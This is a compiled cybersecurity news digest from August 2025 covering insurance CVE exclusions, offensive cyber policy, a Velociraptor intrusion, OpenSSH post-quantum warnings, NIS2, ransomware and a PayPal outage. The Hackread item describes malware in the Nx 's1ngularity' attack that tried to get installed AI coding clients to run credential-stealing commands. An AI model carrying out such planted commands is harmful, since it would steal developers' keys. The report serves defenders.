Root Security Bulletin - CVE: CVE-2025-48384 Date: August 26, 2025 Severity: High (CVSS v3.1 Score: 8.0)

A spyware vendor was behind a recent campaign that abused a vulnerability in WhatsApp to deliver an exploit capable of hacking into iPhones and Macs.

darkreading.com
Robert Lemos, Contributing Writer
August 22, 2025

Some insurers look to limit payouts to companies that don't remediate serious vulnerabilities in a timely manner. Unsurprisingly, most companies don't like those restrictions.

Cyber insurers are testing out new ways to hold policyholders accountable for outdated security, limiting payouts when policyholders fall prey to attacks that use older vulnerabilities or take advantage of holes in the organizations' defenses.

Potential risk-limiting approaches include a sliding scale of accountability — and payouts — based on an unpatched vulnerability's half-life, or whether a company failed to fix a critical vulnerability within a certain number of days, according to a blog post penned by cyber insurer Coalition, which does not support such approaches. Dubbed CVE exclusions, after the Common Vulnerabilities and Exposures (CVE) system widely used to assign identifiers to software security issues, the tactic is not yet widely adopted, and most examples are from insurers outside the US, the firm stated.

The limits could start showing up in companies' policies, however, if demand for cyber insurance continues to grow, creating a seller's market, says John Coletti, head of cyber underwriting at Coalition

"While we will not name names, there are specific examples of this occurring within the industry," he says. "A company should be highly skeptical of buying a policy with a CVE exclusion."

Cyber-insurance firms are struggling to find different ways to limit their vulnerability to large breaches and campaigns that hit a large number of policyholders. Following NotPetya, when companies used business insurance to cover disruptions to operations, efforts to deny payouts based on warlike-act exclusion clauses largely failed but led to enhanced wording in subsequent policies. Increasingly, cyber-insurance firms used data from policyholders or gleaned from cybersecurity assessments, or information from their own managed security services offerings to better determine risk.

Blame the Victim?
Yet requiring all companies to manage major vulnerabilities is a tall order. Currently, the software industry is on track to disclose more than 46,000 vulnerabilities in 2025, up from nearly 40,000 in 2024, according to the National Vulnerability Database (NVD). Of those, likely 30% would be considered of high or critical severity, typically defined as a Common Vulnerability Scoring System (CVSS) score of 8.0 or higher.

cyberscoop.com
article By
Tim Starks
August 27, 2025
Google says it is starting a cyber “disruption unit,” a development that arrives in a potentially shifting U.S. landscape toward more offensive-oriented approaches in cyberspace.

But the contours of that larger shift are still unclear, and whether or to what extent it’s even possible. While there’s some momentum in policymaking and industry circles to put a greater emphasis on more aggressive strategies and tactics to respond to cyberattacks, there are also major barriers.

Sandra Joyce, vice president of Google Threat Intelligence Group, said at a conference Tuesday that more details of the disruption unit would be forthcoming in future months, but the company was looking for “legal and ethical disruption” options as part of the unit’s work.

“What we’re doing in the Google Threat Intelligence Group is intelligence-led proactive identification of opportunities where we can actually take down some type of campaign or operation,” she said at the Center for Cybersecurity Policy and Law event, where she called for partners in the project. “We have to get from a reactive position to a proactive one … if we’re going to make a difference right now.”

The boundaries in the cyber domain between actions considered “cyber offense” and those meant to deter cyberattacks are often unclear. The tradeoff between “active defense” vs. “hacking back” is a common dividing line. On the less aggressive end, “active defense” can include tactics like setting up honeypots designed to lure and trick attackers. At the more extreme end, “hacking back” would typically involve actions that attempt to deliberately destroy an attacker’s systems or networks. Disruption operations might fall between the two, like Microsoft taking down botnet infrastructure in court or the Justice Department seizing stolen cryptocurrency from hackers.

Trump administration officials and some in Congress have been advocating for the U.S. government to go on offense in cyberspace, saying that foreign hackers and criminals aren’t suffering sufficient consequences. Much-criticized legislation to authorize private sector “hacking back” has long stalled in Congress, but some have recently pushed a version of the idea where the president would give “letters of marque” like those for early-U.S. sea privateers to companies authorizing them to legally conduct offensive cyber operations currently forbidden under U.S. law.

The private sector has some catching up to do if there’s to be a worthy field of firms able to focus on offense, experts say.

John Keefe, a former National Security Council official from 2022 to 2024 and National Security Agency official before that, said there had been government talks about a “narrow” letters of marque approach “with the private sector companies that we thought had the capabilities.” The concept was centered on ransomware, Russia and rules of the road for those companies to operate. “It wasn’t going to be the Wild West,” said Keefe, now founder of Ex Astris Scientia, speaking like others in this story at Tuesday’s conference.

The companies with an emphasis on offense largely have only one customer — and that’s governments, said Joe McCaffrey, chief information security officer at defense tech company Anduril Industries. “It’s a really tough business to be in,” he said. “If you develop an exploit, you get to sell to one person legally, and then it gets burned, and you’re back again.”

By their nature, offensive cyber operations in the federal government are already very time- and manpower-intensive, said Brandon Wales, a former top official at the Cybersecurity and Infrastructure Security Agency and now vice president of cybersecurity at SentinelOne. Private sector companies could make their mark by innovating ways to speed up and expand the number of those operations, he said.

Overall, among the options of companies that could do more offensive work, the “industry doesn’t exist yet, but I think it’s coming,” said Andrew McClure, managing director at Forgepoint Capital.

Certainly Congress would have to clarify what companies are able to do legally as well, Wales said.

But that’s just the industry side. There’s plenty more to weigh when stepping up offense.

“However we start, we need to make sure that we are having the ability to measure impact,” said Megan Stifel, chief strategy officer for the Institute for Security and Technology. “Is this working? How do we know?”
If there was a consensus at the conference it’s that the United States — be it the government or private sector — needs to do more to deter adversaries in cyberspace by going after them more in cyberspace.

One knock on that idea has been that the United States can least afford to get into a cyber shooting match, since it’s more reliant on tech than other nations and an escalation would hurt the U.S. the most by presenting more vulnerable targets for enemies. But Dmitri Alperovitch, chairman of the Silverado Policy Accelerator, said that idea was wrong for a couple reasons, among them that other nations have become just as reliant on tech, too.

And “the very idea that in this current bleak state of affairs, engaging in cyber offense is escalatory, I propose to you, is laughable,” he said. “After all, what are our adversaries going to escalate to in response? Ransom more of our hospitals, penetrate more of our water and electric utilities, steal even more of our IP and financial assets?”

Alperovitch continued: “Not only is engaging in thoughtful and careful cyber offense not escalatory, but not doing so is.”

news.sophos.com Written by Sophos Counter Threat Unit Research Team
August 26, 2025
This approach represents an evolution from threat actors abusing remote monitoring and management tools

In August 2025, Counter Threat Unit™ (CTU) researchers investigated an intrusion that involved deployment of the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool. In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server. Enabling the tunnel option in Visual Studio Code triggered a Taegis™ alert, as this option can allow both remote access and remote code execution and has been abused by multiple threat groups in the past.

The threat actor used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain (files[.]qaubctgg[.]workers[.]dev). This location appears to be a staging folder for attacker tools, including the Cloudflare tunneling tool and the Radmin remote administration tool. This file installed Velociraptor, which is configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev. The attacker then used an encoded PowerShell command to download Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled. The threat actor installed code.exe as a service and redirected the output to a log file. They then used the msiexec Windows utility again to download additional malware (sc.msi) from the workers[.]dev folder (see Figure 1).

Velociraptor creating Visual Studio Code tunnel

Figure 1: Process tree showing Velociraptor creating Visual Studio Code tunnel.

The Visual Studio Code tunneling activity triggered a Taegis alert that prompted a Sophos investigation. The analysts provided mitigation advice that enabled the customer to quickly implement remediations such as isolating the affected host, which prevented the attacker from achieving their objectives. Analysis suggests that the malicious activity would likely have led to ransomware deployment.

Threat actors often abuse remote monitoring and management (RMM) tools. In some instances, they leverage preexisting tools on the targeted systems. In others, they deploy the tools during the attack. The Velociraptor incident reveals attackers pivoting to using incident response tools to gain a foothold in a network and minimize the amount of malware they deploy.

Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware. Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviors, and following best practices for securing systems and generating backups can mitigate the ransomware threat. The impact of an attack is greatly reduced if it is caught prior to ransomware deployment.

The following Sophos protections detect activity related to this threat:

Troj/Agent-BLMR
Troj/BatDl-PL
Troj/Mdrop-KDK
To mitigate exposure to this malware, CTU™ researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. The domains may contain malicious content, so consider the risks before opening them in a browser.

Indicator Type Context
files[.]qaubctgg[.]workers[.]dev Domain name Hosted tools used in August 2025 Velociraptor campaign
velo[.]qaubctgg[.]workers[.]dev Domain name C2 server used in August 2025 Velociraptor campaign
Table 1: Indicators for this threat.

openssh.com - OpenSSH supports a number of cryptographic key agreement algorithms considered to be safe against attacks from quantum computers. We recommend that all SSH connections use these algorithms.

OpenSSH has offered post-quantum key agreement (KexAlgorithms) by default since release 9.0 (April 2022), initially via the sntrup761x25519-sha512 algorithm. More recently, in OpenSSH 9.9, we have added a second post-quantum key agreement mlkem768x25519-sha256 and it was made the new default scheme in OpenSSH 10.0 (April 2025).

To encourage migration to these stronger algorithms, OpenSSH 10.1 will warn the user when a non post-quantum key agreement scheme is selected, with the following message:

WARNING: connection is not using a post-quantum key exchange algorithm.
This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
This warning is displayed by default but may be disabled via the WarnWeakCrypto option in ssh_config(5).

Background
A quantum computer (QC) is a device capable of performing computations with information encoded as quantum states. Such a device could quickly solve particular problems that are intractable for existing "classical" computers.

The mathematics that underpin a number of cryptographic algorithms are among the problems that quantum computers are believed to be able to effectively solve. This means that a sufficiently-powerful quantum computer (a.k.a a "cryptographically-relevant" quantum computer) will be able to break them. Most affected is the cryptography used for key agreement and digital signatures, both of which play important roles in SSH.

Fortunately, quantum computers of sufficient power to break cryptography have not been invented yet. Estimates for when a cryptographically-relevant quantum computer will arrive, based on the rate of progress in the field, range from 5-20 years, with many observers expecting them to arrive in the mid-2030s.

The entire privacy of an SSH connection depends on cryptographic key agreement. If an attacker can break the key agreement then they are able to decrypt and view the entire session. The attacker need not perform this attack in real time; they may collect encrypted SSH sessions now and then decrypt them later once they have access to a quantum computer. This is referred to as a "store now, decrypt later" attack (also as "harvest now, decrypt later").

Fortunately, improved "post-quantum" cryptographic algorithms have been devised that rely on different underlying mathematical problems that are understood to not be attackable by a quantum computer.

OpenSSH has supported post-quantum key agreement to prevent "store now, decrypt later" attacks for several years and it has been the default since OpenSSH-9.0, released in 2022.

FAQ
I received a warning from ssh that directed me to this page. What should I do?
As mentioned above, OpenSSH 10.1 started warning users when connections use cryptography that is not safe against quantum computers. If you received such a warning, it means that the server you connected to did not offer one of the two post-quantum key agreement algorithms that are being standardised for the SSH protocol: mlkem768x25519-sha256 and sntrup761x25519-sha512

The ideal solution is to update the server to use an SSH implementation that supports at least one of these. OpenSSH versions 9.0 and greater support sntrup761x25519-sha512 and versions 9.9 and greater support mlkem768x25519-sha256. If your server is already running one of these versions, then check whether the KexAlgorithms option has disabled their use.

If you are unable to update the server and/or you prefer to accept the risk of continuing to use quantum-unsafe cryptography then the warning may be silenced via the WarnWeakCrypto option in ssh_config(5). We recommend doing this selectively, for example:
Match host unsafe.example.com
WarnWeakCrypto no
Quantum computers don't exist yet, why go to all this trouble?
Because of the "store now, decrypt later" attack mentioned above. Traffic sent today is at risk of decryption unless post-quantum key agreement is used.

What about signature algorithms? You said they were at risk too
Yes, most currently-used signature algorithms (including RSA and ECDSA) can be broken by a quantum computer. However, there is no risk to existing traffic in this situation (i.e. there is no analogous "store now, decrypt later"). The only urgency for signature algorithms is ensuring that all classical signature keys are retired in advance of cryptographically-relevant computers becoming a reality. OpenSSH will add support for post-quantum signature algorithms in the future.

I don't believe we'll ever get quantum computers. This is a waste of time
Some people consider the task of scaling existing quantum computers up to the point where they can tackle cryptographic problems to be practically insurmountable. This is a possibility. However, it appears that most of the barriers to a cryptographically-relevant quantum computer are engineering challenges rather than underlying physics.

If we're right about quantum computers being practical, then we will have protected vast quantities of user data. If we're wrong about it, then all we'll have done is moved to cryptographic algorithms with stronger mathematical underpinnings.

These post-quantum algorithms are new. Are we sure they aren't broken?
We're wary of this too. Though post-quantum key agreement algorithms have received a lot of concerted cryptographic attention over the last few years, it's possible that new attacks might be found.

To defend against this happening we have selected post-quantum algorithms with good safety margins. This means that even if they turn out to be weaker than expected they are still likely to be strong enough to be considered fit for purpose.

Additionally, all the post-quantum algorithms implemented by OpenSSH are "hybrids" that combine a post-quantum algorithm with a classical algorithm. For example mlkem768x25519-sha256 combines ML-KEM, a post-quantum key agreement scheme, with ECDH/x25519, a classical key agreement algorithm that was formerly OpenSSH's preferred default. This ensures that the combined, hybrid algorithm is no worse than the previous best classical algorithm, even if the post-quantum algorithm turns out to be completely broken by future cryptanalysis.

incyber.org Marie De Freminville
26.08.25

La directive NIS2 (Network and Information Security 2), adoptée par l'Union européenne, devait être transposée par chaque État membre de l’UE en droit national, au plus tard en octobre 2024, avec des processus et plannings de transposition spécifiques à chaque pays.
Compte-tenu de l’augmentation des menaces cyber, elle impose des normes plus strictes en matière de cybersécurité, de gestion des risques, et de réaction aux incidents, que la directive NIS, datant de 2016.
Cette nouvelle directive élargit les attentes et le champ d’application. Elle a pour objectif d’anticiper les nouvelles formes d’attaques, de passer d’une approche réactive à une stratégie proactive, et de mettre en place une collaboration étendue, pour l’ensemble de l’écosystème, afin d’assurer la résilience des infrastructures critiques.

Son champ d’application est plus large et s’étend aux entités considérées comme essentielles ou importantes (ex. : énergie, transport, santé, infrastructures numériques, administration publique, etc.). Pour plus de détails, consulter https://monespacenis2.cyber.gouv.fr/directive/.

NIS2 n’est pas directement applicable en Suisse. Néanmoins, une entreprise suisse, est concernée, notamment si elle fait partie de la chaîne d’approvisionnement critique d’entreprises de l’Union européenne soumises à NIS2. Par exemple en tant que fournisseur de services numériques, ou infrastructures critiques transfrontalières, ou si elle opère au sein de l’Union européenne, à travers une filiale, qui rentre dans le périmètre de NIS2 (champ d’application mentionné ci-dessus).

Au-delà de la stricte conformité, le respect des standards européens dans le domaine numérique constitue un pilier de la confiance entre les entreprises suisses et leurs partenaires ou clients européens, et l’application de ces standards renforcera la sécurité des entités suisses qui s’y conformeront.

Les principales questions à se poser:

Mon entreprise a-t-elle une filiale, succursale, ou entité juridique dans un pays de l’UE ?
Mon entreprise fournit-elle des services à des clients situés dans l’UE (entreprises, États, infrastructures critiques) ?
Mon entreprise héberge-t-elle, traite-t-elle ou transporte-t-elle des données de citoyens européens ?
Mon entreprise opère-t-elle dans un secteur “essentiel” ( énergie, santé, banques, transport, infrastructures numériques, eau, espace, administration publique) ou important (agroalimentaire, services numériques, recherche, chimie, déchets, fabrication critique)?
Si l’entreprise suisse répond à l’un de ces critères, ou si le contrat qui la lie à son client contient des obligations de conformité à NIS2, elle doit s’assurer que son dispositif de cybersécurité comprend notamment:

Un CISO ou responsable cybersécurité clairement identifié,
Une politique de cybersécurité formelle, validée par la direction,
Une procédure de gestion des incidents (notification ≤ 24h),
Des analyses de risques réguliers, des audits et tests, visant à s’assurer de la solidité du dispositif,
Des formations à la cybersécurité pour administrateurs et dirigeants.
Dans le secteur financier, les institutions bancaires ayant une filiale / succursale dans l’UE ou agissant en tant que sous-traitant ou partenaire de banques/acteurs européens devront mettre en place:

Une gouvernance de la cybersécurité au niveau du conseil d’administration, nommer un responsable cybersécurité (CISO) au niveau exécutif, réviser la stratégie de cybersécurité, mettre en place un comité de sécurité informatique.
Une cartographie et une gestion des risques liés à la sécurité des systèmes d’information : identifier les actifs essentiels au fonctionnement de la banque, inclure la chaîne d’approvisionnement, les fournisseurs IT et interconnexions.
Des procédures de notification d’incidents dans des délais très courts (24 heures), et un plan de réponse aux incidents cyber.
Des audits de conformité, et un tableau de bord (suivi des indicateurs de sécurité et des exigences NIS2).
Une vérification de la maturité des fournisseurs de services bancaires numériques, IT, cloud, etc. dans le domaine de la cybersécurité, c’est-à-dire leur imposer le respect des standards NIS2.
Un programme de sensibilisation et formation pour les collaborateurs, les dirigeants et le conseil d’administration.
Une mise à jour des contrats avec les fournisseurs IT, et une vérification des niveaux de sécurité des sous-traitants.
Le secteur bancaire est déjà très réglementé : la FINMA (autorité des marchés financiers en Suisse) impose des exigences strictes via ses circulaires, comme 2018/3 « Outsourcing » et 2023/1 « Gestion des risques informatiques », fondées sur le risque et la proportionnalité.

Les initiatives de la Confédération (NCSC) s’inscrivent aussi dans une logique de rapprochement avec les standards européens.

Autres entités essentielles du secteur financier, les IMF (Infrastructures de Marchés Financiers) : plateformes de négociation (bourses, MTF- Multi Trading Facilities, OTF- Organised Trading Facilities, systèmes de cotation), chambres de compensation (CCP), dépositaires centraux de titres (CSD), systèmes de règlement, fournisseurs d’indicateurs de référence critiques, opérateurs de données de marché réglementés.

En Suisse, ces entités incluent des acteurs comme SIX Group, SIX x-clear, SIX SIS, ou Swiss Interbank Clearing (SIC), qui gèrent des systèmes critiques nationaux, mais aussi interconnectés avec l’UE.

Bien que la Suisse ne soit pas soumise directement à NIS2, ses IMF opèrent à l’international, en particulier dans l’UE et traitent des données financières critiques, souvent partagées avec des contreparties européennes.

Bien qu’elles soient déjà soumises à des réglementations rigoureuses, comme LFIN, LBVM, Règlement sur l’infrastructure des marchés financiers, directives FINMA, standards ISO 27001/22301, etc., les IMF suisses devront démontrer leur conformité équivalente aux exigences NIS2, même de façon contractuelle ou opérationnelle.

Dans le secteur de la santé, les hôpitaux et cliniques, les laboratoires, les fournisseurs de soins critiques, les entreprises technologiques médicales (eHealth, MedTech, télémédecine) et les prestataires IT (cloud santé, DMP, plateformes de données médicales) collaborant avec l’UE, sont considérés comme entités essentielles (Annexe I de NIS2).

Comme dans l’industrie bancaire, les entreprises de ce secteur ont de nouvelles obligations et doivent être en mesure de produire les documents suivants:

Politique cybersécurité Santé (avec exigences NIS2),
Analyse de risques IT / DMP / IoMT,
Procédure de notification d’incidents,
Registre de conformité / tableau de bord,
Rapports d’audit / plans de remédiation,
Attestations de sensibilisation / format.
Dans le secteur de l’énergie, les opérateurs de réseaux, les producteurs, les fournisseurs, et les prestataires techniques (ex : SCADA: système de supervision industrielle, OT : operational technology, cloud industriel) doivent se conformer à NIS2, dans la mesure où ils doivent répondre aux attentes de partenaires européens et autorités européennes, avec un objectif de renforcer la résilience des infrastructures critiques.

Par ailleurs, les entreprises de ce secteur doivent anticiper l’évolution du droit suisse (LSI, OICN, etc.), qui doit converger avec NIS2, par le biais de l’Ordonnance sur la protection des infrastructures critiques (OICN) et les directives de l’OFEN et du NCSC.

Les particularités du secteur de l’énergie sont les suivantes:

Inclure l’OT, la production, les fournisseurs et la télégestion dans la politique de sécurité
Créer un comité cybersécurité interdisciplinaire avec les représentants IT, OT, opérations, conformité,
Cartographier les systèmes critiques : supervision automatisée, contrôle distribué, réseaux de distribution, postes haute tension, infrastructures partagées avec l’UE
Renforcer les mesures de sécurité sur les systèmes informatiques industriels (notamment séparation des environnements et contrôle des accès), détecter les incidents, mettre en place un plan de continuité d’activité / reprise des activités, revoir les contrats des fournisseurs IT avec une clause de conformité NIS2.
Former les administrateurs et dirigeants, mais aussi les opérateurs industriels et informatiques.
Dans le secteur des transports, la directive NIS2 couvre toutes les formes de transport critiques: aérien (compagnies aériennes, gestionnaires d’aéroports, contrôle aérien), ferroviaire (opérateurs ferroviaires, gestionnaires d’infrastructures, services d’aiguillage), maritime (ports, transporteurs maritimes, systèmes de navigation, opérateurs de fret), et routier (sociétés d’autoroutes, gestion du trafic, plateformes logistiques essentielles (moins prioritaire mais possible selon les pays membres)

La Suisse étant étroitement interconnectée avec les réseaux européens, est partie prenante d’accords transfrontaliers (ex : transport ferroviaire européen, sécurité aérienne avec l’EASA, corridors logistiques). Elle est soumise à ses propres cadres de cybersécurité (p. ex. OICN, LSI, exigences de l’Office fédéral des transports – OFT) et ses entreprises de transport sont donc fortement incitées à s’aligner volontairement sur NIS2, et notamment à sécuriser les systèmes industriels (isolation, segmentation réseau, surveillance des SCADA), identifierindemtifier les systèmes interconnectés avec l’UE.

Enfin, les infrastructures numériques suisses sont étroitement interconnectées à celles de l’UE ( interconnexion Internet, transit IP, cloud européens, réseaux transfrontaliers), elles sont susceptibles d’héberger ou transporter des données européennes (dans le cas d’acteurs cloud ou de services numériques globaux).

Elles sont soumises à la Loi sur la sécurité de l’information (LSI), la Loi sur les télécommunications (LTC), et aux recommandations du NCSC et du SEFRI.qui sont un pilier central de la directive NIS2.

Les fournisseurs d’infrastructure numérique suisses (fournisseurs de services DNS, registres de noms de domaine, services cloud critiques, data centers critiques, réseaux de diffusion de contenu, points d’échange Internet ) opérant en Europe ou servant des clients européens doivent démontrer un niveau de sécurité équivalent à celui exigé par NIS2, souvent via des audits, certifications ou clauses contractuelles.

Elles doivent donc cartographier les clients/services exposés à l’UE, renforcer détection, résilience, surveillance, définir des procédures claires, audits, documentation, contrôler leurs sous-traitants et leur conformitéconformiter à NIS2 (clause à introduire à leurs contrats).

En conclusion, bien que la Suisse impose à ses entreprises des réglementations dans le domaine des risques cyber, les attentes et le champ d’application ne sont pas exactement les mêmes que dans la directive NIS2.

Il est donc important de vérifier, pour les entreprises suisses qui entrent dans le champ d’application NIS2, et qui opèrent avec l’UE, quelles actions mener pour renforcer le dispositif de cybersécurité, indispensable pour maintenir des relations de confiance avec les clients et partenaires, et pour répondre à leurs exigences règlementaires.

www.usine-digitale.fr Alice Vitard
26 août 2025

Dans le cadre du Cyber Solidarity Act, l'Agence de l'Union européenne pour la cybersécurité se voit confier la gestion de la réserve européenne de cybersécurité. Grâce à une enveloppe de 36 millions d'euros, elle est chargée de sélectionner et de coordonner des prestataires capables d'intervenir en cas d'incidents de grande ampleur.

La Commission européenne et l'Agence de l'Union européenne pour la cybersécurité (European Union Agency for Cybersecurity, ENISA) ont annoncé le 26 août avoir signé un accord de contribution qui confie à l'Enisa l'administration et le fonctionnement de la réserve européenne de cybersécurité. Une enveloppe de 36 millions d'euros sur trois ans lui a ainsi été attribuée.

Répondre aux incidents à grande échelle
Cette réserve est prévue à l'article 14 du Cyber Solidarity Act, texte adopté en 2024 pour doter l'Union de moyens renforcés pour détecter, préparer et répondre aux cyberattaques à grande échelle. Elle doit permettre à l'UE de disposer de capacités communes de réponse aux incidents majeurs.

En pratique, la réserve est conçue comme un mécanisme de soutien mobilisable en cas d'incident transfrontalier significatif. Il s'appuie sur un réseau de prestataires de services managés de confiance, pré-sélectionnés via des appels d'offres publics. Ces prestataires peuvent intervenir pour contenir une attaque, assurer une continuité de service ou encore accompagner la reprise après incident.

A noter que le dispositif inclut une clause de flexibilité. En effet, si les services pré-engagés ne sont pas utilisés pour des réponses à incident, ils pourront être convertis en services de préparation (tests de sécurité, exercices de crise et audit de résilience).

La réserve ouverte à un panel d'acteurs
Dans le détail, la réserve sera ouverte aux secteurs critiques définis par la directive NIS 2, aux institutions, agences et organes de l'UE. Sous certaines conditions, les pays tiers associés au programme "Europe numérique" pourront également y avoir accès.

L'Enisa se voit confier quatre missions : lancer et gérer les marchés publics pour sélectionner les prestataires, évaluer les demandes d'assistance provenant des Etats membres, transmettre les demandes de pays tiers à la Commission européenne pour validation ainsi que de suivre et contrôler l'exécution des services fournis par les prestataires de services.

L'accord de contribution prévoit un financement de 36 millions d'euros sur trois ans. Ces fonds s'ajoutent au budget annuel de 26,9 millions d'euros. Ils sont alignés sur la durée de mise à disposition des services. Leur utilisation est contrôlée par l'exécutif européen.

Combler le manque de réponse coordonnée
En mutualisant les ressources, la réserve européenne a pour objectif de combler une lacune de longue date : l'absence d'une capacité de réponse coordonnée aux attaques de grande ampleur. Dans ce cadre, le Cyber Solidarity Act prévoit également le déploiement de SOC transfrontaliers ainsi que des financements européens spécifiques pour soutenir la montée en capacité des Etats membres en matière de sécurité informatique.

therecord.media Alexander Martin
August 27th, 2025

A suspected ransomware attack on a Swedish software provider is believed to have impacted around 200 of the country’s municipal governments.

A suspected ransomware attack on Miljödata, a Swedish software provider used for managing sick leave and similar HR reports, is believed to have impacted around 200 of the country’s municipal governments.

The attack was detected on Saturday, according to the company’s chief executive Erik Hallén. The attackers are attempting to extort Miljödata, police told local newspaper BLT.

Swedish Minister for Civil Defence Carl-Oskar Bohlin wrote in a short update on social media: “The scope of the incident has not yet been clarified, and it is too early to determine the actual consequences.”

Hallén told Swedish press agency TT that around 200 municipalities and regions were affected by the incident. Sweden has 290 municipalities and 21 regions.

Several regional governments have confirmed using Miljödata systems to handle employee data, including “for example, medical certificates, rehabilitation plans, work-related injuries, and more,” according to the local government of the island of Gotland.

Hallén reportedly said Miljödata was “working very intensively with external experts to investigate what happened, what and who was affected, and to restore system functionality.”

“The government is receiving ongoing information about the incident and is in close contact with the relevant authorities,” Bohlin, the civil defense minister, said.

“CERT-SE, which has the task of supporting Swedish society in handling and preventing IT security incidents, has offered advice and support to both the company in question and the affected customers,” the minister added. “The national cybersecurity center is coordinating the measures of the relevant authorities. A police investigation is also underway.”

He stressed the incident underscored the need for high levels of cybersecurity throughout society, and said the Swedish government planned to present a new cybersecurity bill to the Swedish parliament in the near future “that will impose increased requirements on a wide range of actors.”

https://hackread.com
by
Deeba Ahmed
August 28, 2025

A supply chain attack called “s1ngularity” on Nx versions 20.9.0-21.8.0 stole thousands of macOS developer credentials with the help of AI tools.

Asophisticated cyberattack, dubbed the “s1ngularity” attack, has compromised Nx, a popular build platform widely used by software developers. The attack, which began on August 26, 2025, is a supply chain attack, a type of security breach where hackers sneak malicious code into a widely used piece of software, which then infects all the people who use it.

The attack was designed to steal a wide variety of sensitive data, including GitHub tokens, npm authentication keys, and SSH private keys. These credentials are essentially digital keys that provide access to a user’s accounts and systems.

The malicious software also went a step further, targeting API keys for popular AI tools like Gemini, Claude, and Q, demonstrating a new focus on emerging technologies. In addition to stealing data, the attackers installed a destructive payload that modified users’ terminal startup files, causing their terminal sessions to crash.

GitGuardian’s analysis shared with Hackread.com revealed some surprising details about the attack and its victims. The firm found that 85% of the infected systems were running macOS, highlighting the attack’s particular impact on the developer community, which frequently uses Apple computers.

In a curious turn, GitGuardian found that of the hundreds of systems where AI tools were targeted, many of the AI clients unexpectedly resisted the malicious requests. They either outright refused to run the commands or gave responses suggesting they knew they were being asked to do something wrong, showing a potential, though unintentional, new layer of security.
The stolen credentials were not only valuable but also widespread. GitGuardian’s monitoring platform, which tracks public GitHub activity, discovered 1,346 repositories used by the attackers to store stolen data.

To avoid detection, the attackers double-encoded the stolen data before uploading it. This number is far higher than the ten publicly visible repositories, as GitHub was quickly working to delete the rest. An analysis of these repositories revealed 2,349 distinct secrets, with over 1,000 still valid and working at the time of the report. The most common secrets were for GitHub and popular AI platforms.

For anyone who used the malicious Nx versions 20.9.0 through 21.8.0, the most crucial step is to immediately assume that their credentials have been exposed. GitGuardian has created a free service called HasMySecretLeaked that allows developers to check for compromised credentials without ever revealing their actual keys.

This attack reminds us that simply deleting a compromised file is not enough; the actual secret keys and tokens must be revoked and rotated to prevent further access by the attackers.

www.swissinfo.ch August 28, 2025 -
Swiss health groups found national cyber-security centre to warn against cyber attacks.

The cantonal hospital authorities of Ticino and Graubünden are among the founders of the Healthcare Cyber Security Centre (H-CSC).

The premise is that “hospitals are tempting targets for cybercriminals, since they handle large quantities of sensitive data,” said H-CSC as it was officially established in Thurgau.

The initiative in Ticino was also joined by the Gruppo ospedaliero Moncucco, which brings together the Moncucco clinics in Lugano and Santa Chiara in Locarno, and a Graubünden foundation made up of health care associations, including the Thusis hospital.

Founding members also include the university hospitals of Basel, Bern and Zurich, but not in Geneva and Lausanne.

French-speaking institutions are clearly under-represented – the Fribourg and Valais hospitals are the only members from this region. But H-CSC is set to grow. “Membership of the association will be open from 1 September 2025 to all hospitals with a public service mandate”.

The H-CSC project was launched last year on the recommendation of the Federal Office for Cyber Security. The aim of the association is to offer tailor-made security services for hospitals in the field of cyber security.

The H-CSC (https://www.h-csc.ch/) will serve as a platform to promote knowledge exchange and collaboration between hospitals, expand existing competencies and create synergies that will “sustainably strengthen their ability to prevent, detect and contain cyber incidents”, the association’s website states.

Such incidents can “severely compromise the functioning (of hospitals), causing the postponement of surgeries, encryption and/or disclosure of sensitive patient data, or the inoperability of medical devices.”

www.theregister.com 2025/08/28/ -
US payments platform back in action, says it's informing affected customers
Shoppers and merchants in Germany found themselves dealing with billions of euros in frozen transactions this week, thanks to an apparent failure in PayPal's fraud-detection systems.

According to the Association of German Banks, the problem hit on Monday when banks noticed a slew of recent unauthorized direct debits from PayPal. The body said the banks responded in various ways, which is one way of putting it – the Süddeutsche Zeitung reported that some stopped all PayPal transactions, with the total number of frozen payments likely to be around €10 billion.

A spokesperson for the German Savings Banks Association (DSGV), which represents hundreds of regional banks across the country, confirmed the issue to The Register. The DSGV said PayPal had assured it the problem was resolved, adding that PayPal payments had been running smoothly since Tuesday morning and the US payments platform was informing affected customers "directly."

The DSGV said the unauthorized payments had a "significant impact on transactions throughout Europe, particularly in Germany." However, there have been no confirmed reports of the incident being felt outside Germany. Austrian media reported that the banks there had seen no problems.

PayPal is the most popular method of online payment in Germany, having been used for 28.5 percent of online purchases last year, according to research by the EHI Retail Institute. (The next most popular option is buying on account.)

That's largely down to PayPal's payment protection, which appeals to privacy-conscious Germans. In the wake of the unauthorized direct debit issue, financial industry consultant Peter Woeste Christensen told local media that PayPal's particular strength in Germany was partly thanks to the poor user experience of German banks' own apps.

PayPal had not responded to The Register's request for comment at the time of publication, although SZ quoted a spokesperson as saying PayPal had quickly identified the cause and was working with banks to "ensure all accounts are updated." The US company referred to the incident as a "temporary service interruption."

PayPal's reputational hit in Germany is likely to be exacerbated by last week's reports of hackers offering millions of PayPal credentials that they claimed PayPal had recently exposed in plaintext. The hackers' claims appear dubious, with PayPal denying any recent breach, but the reports gained significant traction in Germany.

"It's possible that the data is incorrect or outdated," read a Wednesday advisory from the German consumer organization Stiftung Warentest, which bundled the leak report with this week's snafu. "Nonetheless, PayPal users should change their passwords as a precaution."

cstromblad.com Christoffer Strömblad Wednesday, August 27, 2025 -
In this multi-source analysis I’ve attempted to fuse publicly available information about the UNC6040 group into one report and analysis to provide a better view of the activity cluster named UNC6040 (Google/Mandiant naming).

Executive Summary
UNC6040 represents a sophisticated financially motivated threat group that has emerged as a significant threat to organizations utilizing cloud-based customer relationship management systems. First identified by Google’s Threat Intelligence Group1, this actor has been conducting voice phishing campaigns since at least December 20242 to compromise Salesforce environments for large-scale data theft and extortion purposes.

